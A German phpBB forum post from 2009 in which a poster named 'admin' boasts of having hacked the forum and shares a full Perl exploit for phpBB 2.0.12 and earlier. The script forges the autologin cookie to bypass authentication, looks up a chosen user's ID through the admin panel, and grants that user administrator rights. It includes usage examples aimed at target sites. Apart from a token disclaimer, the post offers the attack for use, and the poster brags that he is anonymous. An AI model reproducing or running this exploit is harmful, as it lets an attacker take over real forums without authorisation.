admin
Anmeldungsdatum: 21.07.2009
Beiträge: 1
|
 Verfasst am: Thu Jul 23, 2009 6:21 pm Titel: Tja |
 |
|
Mit nem einfachen Exploit habe ich dieses Forum gehackt !!!
| Code: | #!/usr/bin/perl -w
# This is just a Copy of the Bypass phpbb 2.0.12 Exploit in German
# It is for pupose only and not for Hacking Forums!!!
# Visit MilwOrm to get the real Exploit!
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Covered in German by uzuki -=Coders.TK=-
Exploit für die PHPBB Version 2.0.12 und Niedriger
Use it like this: "Exploit Part" [site to Hack] [phpbb Folder] [user] [Proxy]
i.e: C:\phpbb.pl www.site.com /forum/ Admin 127.0.0.80
i.e: C:\phpbb.pl www.site.com /forum/index.php Admin 127.0.0.1:80
i.e: C:\phpbb.pl www.site.com /phpbb/ Admin 127.0.0.1:80
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Versucht zu $host $path zu Verbinden !"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Nicht mit diesem Exploit Hackbar !!!"; exit();}
print "+++++++++++++++++++++++++++++\nEs wird versucht die User ID zu bekommen:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "versucht:$user admin status zu geben...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Okay $user hat jetzt Admin rechte !\n++++++++++++++++++++++++++++"; |
Viel spaß damit  und versucht nicht mich zu verfolgen ich binn VOLL anonym ! |
|
FAQ
Suchen
Mitgliederliste
Benutzergruppen
Registrieren
Profil
Einloggen, um private Nachrichten zu lesen
Login
